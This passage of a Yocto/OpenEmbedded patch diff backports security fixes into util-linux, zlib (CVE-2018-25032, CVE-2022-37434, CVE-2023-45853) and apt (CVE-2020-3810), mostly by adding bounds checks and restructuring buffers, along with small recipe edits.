++ if (ul_strtos64(str, &num, 10) != 0) {
++ if (errno == ERANGE)
++ err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
++
++ errx(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
+ }
+ return num;
+ }
+
+-uint16_t strtou16_or_err(const char *str, const char *errmesg)
++uint64_t strtou64_or_err(const char *str, const char *errmesg)
+ {
+- return _strtou16_or_err(str, errmesg, 10);
++ uint64_t num = 0;
++
++ if (ul_strtou64(str, &num, 10)) {
++ if (errno == ERANGE)
++ err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
++
++ errx(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
++ }
++ return num;
+ }
+
+-uint16_t strtox16_or_err(const char *str, const char *errmesg)
++uint64_t strtox64_or_err(const char *str, const char *errmesg)
+ {
+- return _strtou16_or_err(str, errmesg, 16);
++ uint64_t num = 0;
++
++ if (ul_strtou64(str, &num, 16)) {
++ if (errno == ERANGE)
++ err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
++
++ errx(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
++ }
++ return num;
+ }
+
+ int32_t strtos32_or_err(const char *str, const char *errmesg)
+@@ -365,9 +406,9 @@ int32_t strtos32_or_err(const char *str, const char *errmesg)
+ return num;
+ }
+
+-static uint32_t _strtou32_or_err(const char *str, const char *errmesg, int base)
++uint32_t strtou32_or_err(const char *str, const char *errmesg)
+ {
+- uint64_t num = _strtou64_or_err(str, errmesg, base);
++ uint64_t num = strtou64_or_err(str, errmesg);
+
+ if (num > UINT32_MAX) {
+ errno = ERANGE;
+@@ -376,66 +417,48 @@ static uint32_t _strtou32_or_err(const char *str, const char *errmesg, int base)
+ return num;
+ }
+
+-uint32_t strtou32_or_err(const char *str, const char *errmesg)
+-{
+- return _strtou32_or_err(str, errmesg, 10);
+-}
+-
+ uint32_t strtox32_or_err(const char *str, const char *errmesg)
+ {
+- return _strtou32_or_err(str, errmesg, 16);
++ uint64_t num = strtox64_or_err(str, errmesg);
++
++ if (num > UINT32_MAX) {
++ errno = ERANGE;
++ err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
++ }
++ return num;
+ }
+
+-int64_t strtos64_or_err(const char *str, const char *errmesg)
++int16_t strtos16_or_err(const char *str, const char *errmesg)
+ {
+- int64_t num;
+- char *end = NULL;
+-
+- errno = 0;
+- if (str == NULL || *str == '\0')
+- goto err;
+- num = strtoimax(str, &end, 10);
+-
+- if (errno || str == end || (end && *end))
+- goto err;
++ int64_t num = strtos64_or_err(str, errmesg);
+
+- return num;
+-err:
+- if (errno == ERANGE)
++ if (num < INT16_MIN || num > INT16_MAX) {
++ errno = ERANGE;
+ err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
+-
+- errx(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
++ }
++ return num;
+ }
+
+-static uint64_t _strtou64_or_err(const char *str, const char *errmesg, int base)
++uint16_t strtou16_or_err(const char *str, const char *errmesg)
+ {
+- uintmax_t num;
+- char *end = NULL;
+-
+- errno = 0;
+- if (str == NULL || *str == '\0')
+- goto err;
+- num = strtoumax(str, &end, base);
+-
+- if (errno || str == end || (end && *end))
+- goto err;
++ uint64_t num = strtou64_or_err(str, errmesg);
+
+- return num;
+-err:
+- if (errno == ERANGE)
++ if (num > UINT16_MAX) {
++ errno = ERANGE;
+ err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
+-
+- errx(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
++ }
++ return num;
+ }
+
+-uint64_t strtou64_or_err(const char *str, const char *errmesg)
++uint16_t strtox16_or_err(const char *str, const char *errmesg)
+ {
+- return _strtou64_or_err(str, errmesg, 10);
+-}
++ uint64_t num = strtox64_or_err(str, errmesg);
+
+-uint64_t strtox64_or_err(const char *str, const char *errmesg)
+-{
+- return _strtou64_or_err(str, errmesg, 16);
++ if (num > UINT16_MAX) {
++ errno = ERANGE;
++ err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
++ }
++ return num;
+ }
+
+ double strtod_or_err(const char *str, const char *errmesg)
+@@ -1051,15 +1051,25 @@ static int test_strutils_cmp_paths(int a
+
+ int main(int argc, char *argv[])
+ {
+- if (argc == 3 && strcmp(argv[1], "--size") == 0)
++ if (argc == 3 && strcmp(argv[1], "--size") == 0) {
+ return test_strutils_sizes(argc - 1, argv + 1);
+
+- else if (argc == 4 && strcmp(argv[1], "--cmp-paths") == 0)
++ } else if (argc == 4 && strcmp(argv[1], "--cmp-paths") == 0) {
+ return test_strutils_cmp_paths(argc - 1, argv + 1);
+
++ } else if (argc == 3 && strcmp(argv[1], "--str2num") == 0) {
++ uint64_t n;
++
++ if (ul_strtou64(argv[2], &n, 10) == 0) {
++ printf("'%s' --> %ju\n", argv[2], (uintmax_t) n);
++ return EXIT_SUCCESS;
++ }
++ }
++
+ else {
+ fprintf(stderr, "usage: %1$s --size <number>[suffix]\n"
+- " %1$s --cmp-paths <path> <path>\n",
++ " %1$s --cmp-paths <path> <path>\n"
++ " %1$s --num2num <str>\n",
+ argv[0]);
+ exit(EXIT_FAILURE);
+ }
diff --git a/meta/recipes-core/util-linux/util-linux_2.35.1.bb b/meta/recipes-core/util-linux/util-linux_2.35.1.bb
index 516b783887..89dc564ecb 100644
--- a/meta/recipes-core/util-linux/util-linux_2.35.1.bb
+++ b/meta/recipes-core/util-linux/util-linux_2.35.1.bb
@@ -11,6 +11,11 @@ SRC_URI += "file://configure-sbindir.patch \
file://0001-libfdisk-script-accept-sector-size-ignore-unknown-he.patch \
file://0001-kill-include-sys-types.h-before-checking-SYS_pidfd_s.patch \
file://0001-include-cleanup-pidfd-inckudes.patch \
+ file://CVE-2021-37600.patch \
+ file://include-strutils-cleanup-strto-functions.patch \
+ file://CVE-2021-3995.patch \
+ file://CVE-2021-3996.patch \
+ file://CVE-2022-0563.patch \
"
SRC_URI[md5sum] = "7f64882f631225f0295ca05080cee1bf"
SRC_URI[sha256sum] = "d9de3edd287366cd908e77677514b9387b22bc7b88f45b83e1922c3597f1d7f9"
diff --git a/meta/recipes-core/volatile-binds/files/volatile-binds.service.in b/meta/recipes-core/volatile-binds/files/volatile-binds.service.in
index b23355a714..4b34ebd12d 100644
--- a/meta/recipes-core/volatile-binds/files/volatile-binds.service.in
+++ b/meta/recipes-core/volatile-binds/files/volatile-binds.service.in
@@ -1,6 +1,6 @@
[Unit]
Description=Bind mount volatile @where@
-DefaultDependencies=false
+DefaultDependencies=no
Before=local-fs.target
RequiresMountsFor=@whatparent@ @whereparent@
ConditionPathIsReadWrite=@whatparent@
diff --git a/meta/recipes-core/zlib/zlib/CVE-2018-25032.patch b/meta/recipes-core/zlib/zlib/CVE-2018-25032.patch
new file mode 100644
index 0000000000..5cb6183641
--- /dev/null
+++ b/meta/recipes-core/zlib/zlib/CVE-2018-25032.patch
@@ -0,0 +1,347 @@
+CVE: CVE-2018-25032
+Upstream-Status: Backport
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+From 5c44459c3b28a9bd3283aaceab7c615f8020c531 Mon Sep 17 00:00:00 2001
+From: Mark Adler <madler@alumni.caltech.edu>
+Date: Tue, 17 Apr 2018 22:09:22 -0700
+Subject: [PATCH] Fix a bug that can crash deflate on some input when using
+ Z_FIXED.
+
+This bug was reported by Danilo Ramos of Eideticom, Inc. It has
+lain in wait 13 years before being found! The bug was introduced
+in zlib 1.2.2.2, with the addition of the Z_FIXED option. That
+option forces the use of fixed Huffman codes. For rare inputs with
+a large number of distant matches, the pending buffer into which
+the compressed data is written can overwrite the distance symbol
+table which it overlays. That results in corrupted output due to
+invalid distances, and can result in out-of-bound accesses,
+crashing the application.
+
+The fix here combines the distance buffer and literal/length
+buffers into a single symbol buffer. Now three bytes of pending
+buffer space are opened up for each literal or length/distance
+pair consumed, instead of the previous two bytes. This assures
+that the pending buffer cannot overwrite the symbol table, since
+the maximum fixed code compressed length/distance is 31 bits, and
+since there are four bytes of pending space for every three bytes
+of symbol space.
+---
+ deflate.c | 74 ++++++++++++++++++++++++++++++++++++++++---------------
+ deflate.h | 25 +++++++++----------
+ trees.c | 50 +++++++++++--------------------------
+ 3 files changed, 79 insertions(+), 70 deletions(-)
+
+diff --git a/deflate.c b/deflate.c
+index 425babc00..19cba873a 100644
+--- a/deflate.c
++++ b/deflate.c
+@@ -255,11 +255,6 @@ int ZEXPORT deflateInit2_(strm, level, method, windowBits, memLevel, strategy,
+ int wrap = 1;
+ static const char my_version[] = ZLIB_VERSION;
+
+- ushf *overlay;
+- /* We overlay pending_buf and d_buf+l_buf. This works since the average
+- * output size for (length,distance) codes is <= 24 bits.
+- */
+-
+ if (version == Z_NULL || version[0] != my_version[0] ||
+ stream_size != sizeof(z_stream)) {
+ return Z_VERSION_ERROR;
+@@ -329,9 +324,47 @@ int ZEXPORT deflateInit2_(strm, level, method, windowBits, memLevel, strategy,
+
+ s->lit_bufsize = 1 << (memLevel + 6); /* 16K elements by default */
+
+- overlay = (ushf *) ZALLOC(strm, s->lit_bufsize, sizeof(ush)+2);
+- s->pending_buf = (uchf *) overlay;
+- s->pending_buf_size = (ulg)s->lit_bufsize * (sizeof(ush)+2L);
++ /* We overlay pending_buf and sym_buf. This works since the average size
++ * for length/distance pairs over any compressed block is assured to be 31
++ * bits or less.
++ *
++ * Analysis: The longest fixed codes are a length code of 8 bits plus 5
++ * extra bits, for lengths 131 to 257. The longest fixed distance codes are
++ * 5 bits plus 13 extra bits, for distances 16385 to 32768. The longest
++ * possible fixed-codes length/distance pair is then 31 bits total.
++ *
++ * sym_buf starts one-fourth of the way into pending_buf. So there are
++ * three bytes in sym_buf for every four bytes in pending_buf. Each symbol
++ * in sym_buf is three bytes -- two for the distance and one for the
++ * literal/length. As each symbol is consumed, the pointer to the next
++ * sym_buf value to read moves forward three bytes. From that symbol, up to
++ * 31 bits are written to pending_buf. The closest the written pending_buf
++ * bits gets to the next sym_buf symbol to read is just before the last
++ * code is written. At that time, 31*(n-2) bits have been written, just
++ * after 24*(n-2) bits have been consumed from sym_buf. sym_buf starts at
++ * 8*n bits into pending_buf. (Note that the symbol buffer fills when n-1
++ * symbols are written.) The closest the writing gets to what is unread is
++ * then n+14 bits. Here n is lit_bufsize, which is 16384 by default, and
++ * can range from 128 to 32768.
++ *
++ * Therefore, at a minimum, there are 142 bits of space between what is
++ * written and what is read in the overlain buffers, so the symbols cannot
++ * be overwritten by the compressed data. That space is actually 139 bits,
++ * due to the three-bit fixed-code block header.
++ *
++ * That covers the case where either Z_FIXED is specified, forcing fixed
++ * codes, or when the use of fixed codes is chosen, because that choice
++ * results in a smaller compressed block than dynamic codes. That latter
++ * condition then assures that the above analysis also covers all dynamic
++ * blocks. A dynamic-code block will only be chosen to be emitted if it has
++ * fewer bits than a fixed-code block would for the same set of symbols.
++ * Therefore its average symbol length is assured to be less than 31. So
++ * the compressed data for a dynamic block also cannot overwrite the
++ * symbols from which it is being constructed.
++ */
++
++ s->pending_buf = (uchf *) ZALLOC(strm, s->lit_bufsize, 4);
++ s->pending_buf_size = (ulg)s->lit_bufsize * 4;
+
+ if (s->window == Z_NULL || s->prev == Z_NULL || s->head == Z_NULL ||
+ s->pending_buf == Z_NULL) {
+@@ -340,8 +373,12 @@ int ZEXPORT deflateInit2_(strm, level, method, windowBits, memLevel, strategy,
+ deflateEnd (strm);
+ return Z_MEM_ERROR;
+ }
+- s->d_buf = overlay + s->lit_bufsize/sizeof(ush);
+- s->l_buf = s->pending_buf + (1+sizeof(ush))*s->lit_bufsize;
++ s->sym_buf = s->pending_buf + s->lit_bufsize;
++ s->sym_end = (s->lit_bufsize - 1) * 3;
++ /* We avoid equality with lit_bufsize*3 because of wraparound at 64K
++ * on 16 bit machines and because stored blocks are restricted to
++ * 64K-1 bytes.
++ */
+
+ s->level = level;
+ s->strategy = strategy;
+@@ -552,7 +589,7 @@ int ZEXPORT deflatePrime (strm, bits, value)
+
+ if (deflateStateCheck(strm)) return Z_STREAM_ERROR;
+ s = strm->state;
+- if ((Bytef *)(s->d_buf) < s->pending_out + ((Buf_size + 7) >> 3))
++ if (s->sym_buf < s->pending_out + ((Buf_size + 7) >> 3))
+ return Z_BUF_ERROR;
+ do {
+ put = Buf_size - s->bi_valid;
+@@ -1113,7 +1150,6 @@ int ZEXPORT deflateCopy (dest, source)
+ #else
+ deflate_state *ds;
+ deflate_state *ss;
+- ushf *overlay;
+
+
+ if (deflateStateCheck(source) || dest == Z_NULL) {
+@@ -1133,8 +1169,7 @@ int ZEXPORT deflateCopy (dest, source)
+ ds->window = (Bytef *) ZALLOC(dest, ds->w_size, 2*sizeof(Byte));
+ ds->prev = (Posf *) ZALLOC(dest, ds->w_size, sizeof(Pos));
+ ds->head = (Posf *) ZALLOC(dest, ds->hash_size, sizeof(Pos));
+- overlay = (ushf *) ZALLOC(dest, ds->lit_bufsize, sizeof(ush)+2);
+- ds->pending_buf = (uchf *) overlay;
++ ds->pending_buf = (uchf *) ZALLOC(dest, ds->lit_bufsize, 4);
+
+ if (ds->window == Z_NULL || ds->prev == Z_NULL || ds->head == Z_NULL ||
+ ds->pending_buf == Z_NULL) {
+@@ -1148,8 +1183,7 @@ int ZEXPORT deflateCopy (dest, source)
+ zmemcpy(ds->pending_buf, ss->pending_buf, (uInt)ds->pending_buf_size);
+
+ ds->pending_out = ds->pending_buf + (ss->pending_out - ss->pending_buf);
+- ds->d_buf = overlay + ds->lit_bufsize/sizeof(ush);
+- ds->l_buf = ds->pending_buf + (1+sizeof(ush))*ds->lit_bufsize;
++ ds->sym_buf = ds->pending_buf + ds->lit_bufsize;
+
+ ds->l_desc.dyn_tree = ds->dyn_ltree;
+ ds->d_desc.dyn_tree = ds->dyn_dtree;
+@@ -1925,7 +1959,7 @@ local block_state deflate_fast(s, flush)
+ FLUSH_BLOCK(s, 1);
+ return finish_done;
+ }
+- if (s->last_lit)
++ if (s->sym_next)
+ FLUSH_BLOCK(s, 0);
+ return block_done;
+ }
+@@ -2056,7 +2090,7 @@ local block_state deflate_slow(s, flush)
+ FLUSH_BLOCK(s, 1);
+ return finish_done;
+ }
+- if (s->last_lit)
++ if (s->sym_next)
+ FLUSH_BLOCK(s, 0);
+ return block_done;
+ }
+@@ -2131,7 +2165,7 @@ local block_state deflate_rle(s, flush)
+ FLUSH_BLOCK(s, 1);
+ return finish_done;
+ }
+- if (s->last_lit)
++ if (s->sym_next)
+ FLUSH_BLOCK(s, 0);
+ return block_done;
+ }
+@@ -2170,7 +2204,7 @@ local block_state deflate_huff(s, flush)
+ FLUSH_BLOCK(s, 1);
+ return finish_done;
+ }
+- if (s->last_lit)
++ if (s->sym_next)
+ FLUSH_BLOCK(s, 0);
+ return block_done;
+ }
+diff --git a/deflate.h b/deflate.h
+index 23ecdd312..d4cf1a98b 100644
+--- a/deflate.h
++++ b/deflate.h
+@@ -217,7 +217,7 @@ typedef struct internal_state {
+ /* Depth of each subtree used as tie breaker for trees of equal frequency
+ */
+
+- uchf *l_buf; /* buffer for literals or lengths */
++ uchf *sym_buf; /* buffer for distances and literals/lengths */
+
+ uInt lit_bufsize;
+ /* Size of match buffer for literals/lengths. There are 4 reasons for
+@@ -239,13 +239,8 @@ typedef struct internal_state {
+ * - I can't count above 4
+ */
+
+- uInt last_lit; /* running index in l_buf */
+-
+- ushf *d_buf;
+- /* Buffer for distances. To simplify the code, d_buf and l_buf have
+- * the same number of elements. To use different lengths, an extra flag
+- * array would be necessary.
+- */
++ uInt sym_next; /* running index in sym_buf */
++ uInt sym_end; /* symbol table full when sym_next reaches this */
+
+ ulg opt_len; /* bit length of current block with optimal trees */
+ ulg static_len; /* bit length of current block with static trees */
+@@ -325,20 +320,22 @@ void ZLIB_INTERNAL _tr_stored_block OF((deflate_state *s, charf *buf,
+
+ # define _tr_tally_lit(s, c, flush) \
+ { uch cc = (c); \
+- s->d_buf[s->last_lit] = 0; \
+- s->l_buf[s->last_lit++] = cc; \
++ s->sym_buf[s->sym_next++] = 0; \
++ s->sym_buf[s->sym_next++] = 0; \
++ s->sym_buf[s->sym_next++] = cc; \
+ s->dyn_ltree[cc].Freq++; \
+- flush = (s->last_lit == s->lit_bufsize-1); \
++ flush = (s->sym_next == s->sym_end); \
+ }
+ # define _tr_tally_dist(s, distance, length, flush) \
+ { uch len = (uch)(length); \
+ ush dist = (ush)(distance); \
+- s->d_buf[s->last_lit] = dist; \
+- s->l_buf[s->last_lit++] = len; \
++ s->sym_buf[s->sym_next++] = dist; \
++ s->sym_buf[s->sym_next++] = dist >> 8; \
++ s->sym_buf[s->sym_next++] = len; \
+ dist--; \
+ s->dyn_ltree[_length_code[len]+LITERALS+1].Freq++; \
+ s->dyn_dtree[d_code(dist)].Freq++; \
+- flush = (s->last_lit == s->lit_bufsize-1); \
++ flush = (s->sym_next == s->sym_end); \
+ }
+ #else
+ # define _tr_tally_lit(s, c, flush) flush = _tr_tally(s, 0, c)
+diff --git a/trees.c b/trees.c
+index 4f4a65011..decaeb7c3 100644
+--- a/trees.c
++++ b/trees.c
+@@ -416,7 +416,7 @@ local void init_block(s)
+
+ s->dyn_ltree[END_BLOCK].Freq = 1;
+ s->opt_len = s->static_len = 0L;
+- s->last_lit = s->matches = 0;
++ s->sym_next = s->matches = 0;
+ }
+
+ #define SMALLEST 1
+@@ -948,7 +948,7 @@ void ZLIB_INTERNAL _tr_flush_block(s, buf, stored_len, last)
+
+ Tracev((stderr, "\nopt %lu(%lu) stat %lu(%lu) stored %lu lit %u ",
+ opt_lenb, s->opt_len, static_lenb, s->static_len, stored_len,
+- s->last_lit));
++ s->sym_next / 3));
+
+ if (static_lenb <= opt_lenb) opt_lenb = static_lenb;
+
+@@ -1017,8 +1017,9 @@ int ZLIB_INTERNAL _tr_tally (s, dist, lc)
+ unsigned dist; /* distance of matched string */
+ unsigned lc; /* match length-MIN_MATCH or unmatched char (if dist==0) */
+ {
+- s->d_buf[s->last_lit] = (ush)dist;
+- s->l_buf[s->last_lit++] = (uch)lc;
++ s->sym_buf[s->sym_next++] = dist;
++ s->sym_buf[s->sym_next++] = dist >> 8;
++ s->sym_buf[s->sym_next++] = lc;
+ if (dist == 0) {
+ /* lc is the unmatched char */
+ s->dyn_ltree[lc].Freq++;
+@@ -1033,30 +1034,7 @@ int ZLIB_INTERNAL _tr_tally (s, dist, lc)
+ s->dyn_ltree[_length_code[lc]+LITERALS+1].Freq++;
+ s->dyn_dtree[d_code(dist)].Freq++;
+ }
+-
+-#ifdef TRUNCATE_BLOCK
+- /* Try to guess if it is profitable to stop the current block here */
+- if ((s->last_lit & 0x1fff) == 0 && s->level > 2) {
+- /* Compute an upper bound for the compressed length */
+- ulg out_length = (ulg)s->last_lit*8L;
+- ulg in_length = (ulg)((long)s->strstart - s->block_start);
+- int dcode;
+- for (dcode = 0; dcode < D_CODES; dcode++) {
+- out_length += (ulg)s->dyn_dtree[dcode].Freq *
+- (5L+extra_dbits[dcode]);
+- }
+- out_length >>= 3;
+- Tracev((stderr,"\nlast_lit %u, in %ld, out ~%ld(%ld%%) ",
+- s->last_lit, in_length, out_length,
+- 100L - out_length*100L/in_length));
+- if (s->matches < s->last_lit/2 && out_length < in_length/2) return 1;
+- }
+-#endif
+- return (s->last_lit == s->lit_bufsize-1);
+- /* We avoid equality with lit_bufsize because of wraparound at 64K
+- * on 16 bit machines and because stored blocks are restricted to
+- * 64K-1 bytes.
+- */
++ return (s->sym_next == s->sym_end);
+ }
+
+ /* ===========================================================================
+@@ -1069,13 +1047,14 @@ local void compress_block(s, ltree, dtree)
+ {
+ unsigned dist; /* distance of matched string */
+ int lc; /* match length or unmatched char (if dist == 0) */
+- unsigned lx = 0; /* running index in l_buf */
++ unsigned sx = 0; /* running index in sym_buf */
+ unsigned code; /* the code to send */
+ int extra; /* number of extra bits to send */
+
+- if (s->last_lit != 0) do {
+- dist = s->d_buf[lx];
+- lc = s->l_buf[lx++];
++ if (s->sym_next != 0) do {
++ dist = s->sym_buf[sx++] & 0xff;
++ dist += (unsigned)(s->sym_buf[sx++] & 0xff) << 8;
++ lc = s->sym_buf[sx++];
+ if (dist == 0) {
+ send_code(s, lc, ltree); /* send a literal byte */
+ Tracecv(isgraph(lc), (stderr," '%c' ", lc));
+@@ -1100,11 +1079,10 @@ local void compress_block(s, ltree, dtree)
+ }
+ } /* literal or match pair ? */
+
+- /* Check that the overlay between pending_buf and d_buf+l_buf is ok: */
+- Assert((uInt)(s->pending) < s->lit_bufsize + 2*lx,
+- "pendingBuf overflow");
++ /* Check that the overlay between pending_buf and sym_buf is ok: */
++ Assert(s->pending < s->lit_bufsize + sx, "pendingBuf overflow");
+
+- } while (lx < s->last_lit);
++ } while (sx < s->sym_next);
+
+ send_code(s, END_BLOCK, ltree);
+ }
diff --git a/meta/recipes-core/zlib/zlib/CVE-2022-37434.patch b/meta/recipes-core/zlib/zlib/CVE-2022-37434.patch
new file mode 100644
index 0000000000..d29e6e0f1f
--- /dev/null
+++ b/meta/recipes-core/zlib/zlib/CVE-2022-37434.patch
@@ -0,0 +1,44 @@
+From 8617d83d6939754ae3a04fc2d22daa18eeea2a43 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Wed, 17 Aug 2022 10:15:57 +0530
+Subject: [PATCH] CVE-2022-37434
+
+Upstream-Status: Backport [https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1 & https://github.com/madler/zlib/commit/1eb7682f845ac9e9bf9ae35bbfb3bad5dacbd91d]
+CVE: CVE-2022-37434
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+Fix a bug when getting a gzip header extra field with inflate().
+
+If the extra field was larger than the space the user provided with
+inflateGetHeader(), and if multiple calls of inflate() delivered
+the extra header data, then there could be a buffer overflow of the
+provided space. This commit assures that provided space is not
+exceeded.
+
+ Fix extra field processing bug that dereferences NULL state->head.
+
+The recent commit to fix a gzip header extra field processing bug
+introduced the new bug fixed here.
+---
+ inflate.c | 5 +++--
+ 1 file changed, 3 insertions(+), 2 deletions(-)
+
+diff --git a/inflate.c b/inflate.c
+index ac333e8..cd01857 100644
+--- a/inflate.c
++++ b/inflate.c
+@@ -759,8 +759,9 @@ int flush;
+ if (copy > have) copy = have;
+ if (copy) {
+ if (state->head != Z_NULL &&
+- state->head->extra != Z_NULL) {
+- len = state->head->extra_len - state->length;
++ state->head->extra != Z_NULL &&
++ (len = state->head->extra_len - state->length) <
++ state->head->extra_max) {
+ zmemcpy(state->head->extra + len, next,
+ len + copy > state->head->extra_max ?
+ state->head->extra_max - len : copy);
+--
+2.25.1
+
diff --git a/meta/recipes-core/zlib/zlib/CVE-2023-45853.patch b/meta/recipes-core/zlib/zlib/CVE-2023-45853.patch
new file mode 100644
index 0000000000..654579eb81
--- /dev/null
+++ b/meta/recipes-core/zlib/zlib/CVE-2023-45853.patch
@@ -0,0 +1,40 @@
+From 73331a6a0481067628f065ffe87bb1d8f787d10c Mon Sep 17 00:00:00 2001
+From: Hans Wennborg <hans@chromium.org>
+Date: Fri, 18 Aug 2023 11:05:33 +0200
+Subject: [PATCH] Reject overflows of zip header fields in minizip.
+
+This checks the lengths of the file name, extra field, and comment
+that would be put in the zip headers, and rejects them if they are
+too long. They are each limited to 65535 bytes in length by the zip
+format. This also avoids possible buffer overflows if the provided
+fields are too long.
+
+Upstream-Status: Backport from [https://github.com/madler/zlib/commit/73331a6a0481067628f065ffe87bb1d8f787d10c]
+CVE: CVE-2023-45853
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+---
+ contrib/minizip/zip.c | 11 +++++++++++
+ 1 file changed, 11 insertions(+)
+
+diff --git a/contrib/minizip/zip.c b/contrib/minizip/zip.c
+index 3d3d4cadd..0446109b2 100644
+--- a/contrib/minizip/zip.c
++++ b/contrib/minizip/zip.c
+@@ -1043,6 +1043,17 @@ extern int ZEXPORT zipOpenNewFileInZip4_64(zipFile file, const char* filename, c
+ return ZIP_PARAMERROR;
+ #endif
+
++ // The filename and comment length must fit in 16 bits.
++ if ((filename!=NULL) && (strlen(filename)>0xffff))
++ return ZIP_PARAMERROR;
++ if ((comment!=NULL) && (strlen(comment)>0xffff))
++ return ZIP_PARAMERROR;
++ // The extra field length must fit in 16 bits. If the member also requires
++ // a Zip64 extra block, that will also need to fit within that 16-bit
++ // length, but that will be checked for later.
++ if ((size_extrafield_local>0xffff) || (size_extrafield_global>0xffff))
++ return ZIP_PARAMERROR;
++
+ zi = (zip64_internal*)file;
+
+ if (zi->in_opened_file_inzip == 1)
diff --git a/meta/recipes-core/zlib/zlib_1.2.11.bb b/meta/recipes-core/zlib/zlib_1.2.11.bb
index ef9431ae47..9355f0556e 100644
--- a/meta/recipes-core/zlib/zlib_1.2.11.bb
+++ b/meta/recipes-core/zlib/zlib_1.2.11.bb
@@ -8,7 +8,10 @@ LIC_FILES_CHKSUM = "file://zlib.h;beginline=6;endline=23;md5=5377232268e952e9ef6
SRC_URI = "${SOURCEFORGE_MIRROR}/libpng/${BPN}/${PV}/${BPN}-${PV}.tar.xz \
file://ldflags-tests.patch \
+ file://CVE-2018-25032.patch \
file://run-ptest \
+ file://CVE-2022-37434.patch \
+ file://CVE-2023-45853.patch \
"
UPSTREAM_CHECK_URI = "http://zlib.net/"
@@ -50,3 +53,6 @@ do_install_append_class-target() {
}
BBCLASSEXTEND = "native nativesdk"
+
+# this CVE is for cloudflare zlib
+CVE_CHECK_WHITELIST += "CVE-2023-6992"
diff --git a/meta/recipes-devtools/apt/apt.inc b/meta/recipes-devtools/apt/apt.inc
index 13f5969f86..251795eeca 100644
--- a/meta/recipes-devtools/apt/apt.inc
+++ b/meta/recipes-devtools/apt/apt.inc
@@ -2,6 +2,7 @@ SUMMARY = "Advanced front-end for dpkg"
DESCRIPTION = "Provides command-line tools for searching and managing as well \
as querying information about packages as a low-level access to all features \
of the libapt-pkg library."
+HOMEPAGE = "https://packages.debian.org/jessie/apt"
LICENSE = "GPLv2.0+"
SECTION = "base"
@@ -17,6 +18,7 @@ SRC_URI = "https://launchpad.net/ubuntu/+archive/primary/+sourcefiles/${BPN}/${P
file://0001-environment.mak-musl-based-systems-can-generate-shar.patch \
file://0001-apt-1.2.12-Fix-musl-build.patch \
file://0001-Include-array.h-for-std-array.patch \
+ file://CVE-2020-3810.patch \
"
SRC_URI[md5sum] = "d30eed9304e82ea8238c854b5c5a34d9"
SRC_URI[sha256sum] = "03ded4f5e9b8d43ecec083704b2dcabf20c182ed382db9ac7251da0b0b038059"
@@ -35,5 +37,9 @@ do_configure_prepend() {
rm -rf ${S}/buildlib/config.guess
}
+# there are code generation issues with some compilers in the SHA256 implementation
+# turn off strict-aliasing to avoid these issues
+CXXFLAGS:append = " -fno-strict-aliasing"
+
USERADD_PACKAGES = "${PN}"
USERADD_PARAM_${PN} = "--system --no-create-home --home-dir /nonexistent --shell /bin/false --user-group _apt"
diff --git a/meta/recipes-devtools/apt/apt/CVE-2020-3810.patch b/meta/recipes-devtools/apt/apt/CVE-2020-3810.patch
new file mode 100644
index 0000000000..cf1206a3fa
--- /dev/null
+++ b/meta/recipes-devtools/apt/apt/CVE-2020-3810.patch
@@ -0,0 +1,174 @@
+From dceb1e49e4b8e4dadaf056be34088b415939cda6 Mon Sep 17 00:00:00 2001
+From: Julian Andres Klode <julian.klode@canonical.com>
+Date: Tue, 12 May 2020 11:49:09 +0200
+Subject: [PATCH] SECURITY UPDATE: Fix out of bounds read in .ar and .tar
+ implementation (CVE-2020-3810)
+
+When normalizing ar member names by removing trailing whitespace
+and slashes, an out-out-bound read can be caused if the ar member
+name consists only of such characters, because the code did not
+stop at 0, but would wrap around and continue reading from the
+stack, without any limit.
+
+Add a check to abort if we reached the first character in the
+name, effectively rejecting the use of names consisting just
+of slashes and spaces.
+
+Furthermore, certain error cases in arfile.cc and extracttar.cc have
+included member names in the output that were not checked at all and
+might hence not be nul terminated, leading to further out of bound reads.
+
+Fixes Debian/apt#111
+LP: #1878177
+
+CVE: CVE-2020-3810
+
+Upstream-Status: Backport:
+https://salsa.debian.org/apt-team/apt/-/commit/dceb1e49e4b8e4dadaf056be34088b415939cda6
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+apt-inst/contrib/arfile.cc | 11 ++-
+apt-inst/contrib/extracttar.cc | 2 +-
+.../test-github-111-invalid-armember | 88 +++++++++++++++++++
+ 3 files changed, 98 insertions(+), 3 deletions(-)
+ create mode 100755 test/integration/test-github-111-invalid-armember
+
+diff --git a/apt-inst/contrib/arfile.cc b/st/contrib/arfile.cc
+index 3fc3afedb..5cb43c690 100644
+--- a/apt-inst/contrib/arfile.cc
++++ b/apt-inst/contrib/arfile.cc
+@@ -92,7 +92,7 @@ bool ARArchive::LoadHeaders()
+ StrToNum(Head.Size,Memb->Size,sizeof(Head.Size)) == false)
+ {
+ delete Memb;
+- return _error->Error(_("Invalid archive member header %s"), Head.Name);
++ return _error->Error(_("Invalid archive member header"));
+ }
+
+ // Check for an extra long name string
+@@ -119,7 +119,14 @@ bool ARArchive::LoadHeaders()
+ else
+ {
+ unsigned int I = sizeof(Head.Name) - 1;
+- for (; Head.Name[I] == ' ' || Head.Name[I] == '/'; I--);
++ for (; Head.Name[I] == ' ' || Head.Name[I] == '/'; I--)
++ {
++ if (I == 0)
++ {
++ delete Memb;
++ return _error->Error(_("Invalid archive member header"));
++ }
++ }
+ Memb->Name = std::string(Head.Name,I+1);
+ }
+
+diff --git a/apt-inst/contrib/extracttar.cc b/apt-inst/contrib/extracttar.cc
+index 9bb0a55c0..b22f59dbc 100644
+--- a/apt-inst/contrib/extracttar.cc
